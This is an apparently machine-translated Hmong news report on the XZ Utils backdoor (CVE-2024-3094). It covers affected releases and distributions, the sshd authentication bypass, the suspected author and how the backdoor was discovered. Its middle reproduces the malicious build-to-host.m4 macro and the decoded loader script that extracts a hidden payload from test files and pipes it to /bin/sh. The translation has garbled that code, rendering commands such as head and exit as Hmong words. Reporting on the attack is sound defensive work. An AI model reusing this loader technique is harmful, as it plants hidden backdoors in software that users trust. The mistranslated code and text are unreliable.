Muaj ib lub qhov rooj tom qab (CVE-2024-3094) tau pom nyob rau hauv pob khoom XZ Utils, uas suav nrog lub tsev qiv ntawv liblzma thiab cov khoom siv rau kev ua haujlwm nrog cov ntaub ntawv compressed hauv hom ntawv ".xz". Lub qhov rooj tom qab no tso cai rau kev cuam tshuam thiab hloov kho cov ntaub ntawv ua tiav los ntawm cov ntawv thov txuas nrog lub tsev qiv ntawv liblzma. Lub hom phiaj tseem ceeb ntawm lub qhov rooj tom qab yog OpenSSH server, uas nyob rau hauv qee qhov kev faib tawm txuas nrog lub tsev qiv ntawv libsystemd, uas tig mus siv liblzma. Kev txuas sshd rau lub tsev qiv ntawv tsis muaj zog tso cai rau cov neeg tawm tsam nkag mus rau SSH server yam tsis muaj kev lees paub.
Lub qhov rooj sab nraud tau muaj nyob rau hauv cov ntawv tso tawm 5.6.0 thiab 5.6.1, luam tawm rau lub Ob Hlis 24 thiab Lub Peb Hlis 9, uas tau tswj kom nkag mus rau hauv qee qhov kev faib tawm thiab chaw khaws cia, piv txwv li, Gentoo, Arch. Linux, Debian sid/tsis ruaj khov, Fedora Rawhide thiab 40-beta, openSUSE Hoobkas thiab tumbleweed, LibreELEC, Alpine ntug, Solus, NixOS tsis ruaj khov, OpenIndiana, OpenMandriva dov, pkgsrc tam sim no, Slackware tam sim no, Manjaro kev sim. Txhua tus neeg siv xz 5.6.0 thiab 5.6.1 tso tawm raug qhia kom tam sim ntawd downgrade mus rau version 5.4.6.
Ib qho tseem ceeb uas ua rau muaj teeb meem yog tias qhov backdoored liblzma version tsis tau ua rau nws mus rau hauv cov kev tso tawm ruaj khov ntawm cov kev faib tawm loj, tab sis nws tau cuam tshuam rau openSUSE Tumbleweed thiab Fedora 40-beta. Arch Linux thiab Gentoo siv ib qho version uas tsis muaj zog ntawm zx, tab sis tsis muaj zog rau kev tawm tsam vim lawv tsis siv qhov systemd-notify patch rau openssh, uas ua rau sshd txuas rau liblzma. Lub backdoor tsuas yog cuam tshuam rau x86_64 kernel-based systems. Linux thiab C tsev qiv ntawv Glibc.
Tus lej qhib qhov rooj tom qab tau zais rau hauv m4 macros los ntawm cov ntaub ntawv build-to-host.m4 uas siv los ntawm automake toolkit thaum lub sijhawm tsim. Thaum lub sijhawm tsim, cov haujlwm nyuaj uas tsis meej pem raws li cov ntaub ntawv khaws cia (bad-3-corrupt_lzma2.xz, good-large_compressed.lzma) siv rau kev sim ua haujlwm raug tau tsim cov ntaub ntawv khoom uas muaj cov lej phem. Cov lej no tau suav nrog hauv lub tsev qiv ntawv liblzma thiab hloov pauv qhov kev xav ntawm qee qhov ntawm nws cov haujlwm. Cov m4 macros uas qhib qhov rooj tom qab tau suav nrog hauv cov ntawv tso tawm tarballs tab sis tsis muaj nyob hauv Git repository. Txawm li cas los xij, cov ntaub ntawv xeem phem tau muaj nyob hauv lub chaw cia khoom, txhais tau tias lub tshuab txhaj tshuaj backdoor muaj kev nkag mus rau ob qho tib si lub chaw cia khoom thiab cov txheej txheem tsim tawm.
Thaum liblzma siv rau hauv cov ntawv thov, kev hloov kho phem tuaj yeem siv los cuam tshuam lossis hloov kho cov ntaub ntawv thiab cuam tshuam nrog kev ua haujlwm sshd. Tshwj xeeb, cov lej phem tau hloov RSA_public_decrypt function kom hla dhau sshd authentication. Lub backdoor suav nrog kev tiv thaiv los ntawm kev kuaj pom thiab tseem tsis tau kuaj pom thaum LANG thiab TERM ib puag ncig cov hloov pauv tau teeb tsa (piv txwv li, thaum khiav cov txheej txheem hauv lub davhlau ya nyob twg) thiab LD_DEBUG thiab LD_PROFILE ib puag ncig cov hloov pauv tsis tau teeb tsa. Nws kuj tau qhib tsuas yog thaum /usr/sbin/sshd executable tau ua tiav. Lub backdoor kuj suav nrog txhais tau tias los ntes kev ua tiav hauv debug ib puag ncig.
Tshwj xeeb, cov ntaub ntawv m4/build-to-host.m4 siv cov qauv hauv qab no: gl_am_configmake=`grep -aErls «#{4}[[:alnum:]]{5}#{4}$» $srcdir/ 2>/dev/null` … gl_[$1]_config='sed \»r\n\» $gl_am_configmake | eval $gl_path_map | $gl_[$1]_prefix -d 2>/dev/null'
Hauv thawj qhov kev tsim kho, qhov kev ua haujlwm grep pom cov ntaub ntawv tests/files/bad-3-corrupt_lzma2.xz, uas, thaum unpacked, tsim cov ntawv sau: ####Nyob zoo#### #345U211267$^D330^W [ ! $(uname) = «Linux" ] && tawm 0 [ ! $(uname) = "Linux" ] && tawm 0 [ ! $(uname) = "Linux" ] && tawm 0 [ ! $(uname) = "Linux" ] && tawm 0 [ ! $(uname) = "Linux" ] && tawm 0 eval `grep ^srcdir= config.status` yog tias sim -f ../../config.status; ces eval `grep ^srcdir= ../../config.status` srcdir="../../$srcdir" fi export i="((lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && lub taub hau -c +2048 && (lub taub hau -c +1024 >/dev/null) && taub hau -c +2048 && (taub hau -c +1024 >/dev/null) && taub hau -c +2048 && (taub hau -c +1024 >/dev/null) && taub hau -c +939)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31233|tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377")|xz -F raw —lzma1 -dc|/bin/sh ####Ntiaj Teb####
Yuav ua li cas cov neeg tawm tsam thiaj li tau nkag mus rau hauv xz project infrastructure tseem tsis meej. Nws kuj tsis meej tias muaj pes tsawg tus neeg siv thiab cov project raug cuam tshuam los ntawm qhov backdoor. Tus sau backdoor uas raug liam tias yog (JiaT75 - Jia Tan), uas tau tshaj tawm cov ntaub ntawv khaws cia uas muaj cov lej phem rau lub chaw cia khoom, tau sib tham nrog cov neeg tsim khoom Fedora thiab xa cov lus thov rub mus rau Debianmuaj feem cuam tshuam nrog kev hloov pauv ntawm kev faib tawm mus rau ceg xz 5.6.0, thiab tsis tau tsa kev ua xyem xyav, vim nws tau koom nrog kev tsim kho xz rau ob xyoos dhau los thiab yog tus pab txhawb thib ob loj tshaj plaws. Ntxiv rau qhov project xz, tus sau ntawv backdoor kuj tau pab txhawb rau cov pob khoom xz-java thiab xz-embedded. Ntxiv mus, Jia Tan nyuam qhuav raug xaiv los ua tus saib xyuas ntawm XZ Embedded project, uas siv hauv kernel. Linux.
Qhov kev hloov pauv phem tau pom tom qab tshuaj xyuas kev siv CPU ntau dhau thiab qhov yuam kev rov qab los ntawm valgrind thaum txuas ntawm ssh rau cov kab ke raws li Debian sid. Nws tsim nyog sau tseg tias xz 5.6.1 tso tawm suav nrog cov kev hloov pauv uas tus sau ntawv backdoor tau npaj los teb rau cov lus tsis txaus siab txog sshd qeeb thiab kev sib tsoo uas tshwm sim tom qab hloov kho mus rau zx 5.6.0, uas muaj backdoor. Ntxiv mus, xyoo tas los, Jia Tan tau qhia txog cov kev hloov pauv uas tsis sib xws nrog hom kev txheeb xyuas "-fsanitize = chaw nyob", uas ua rau nws raug kaw thaum lub sijhawm sim fuzzing.
Tau qhov twg los: opennet.ru
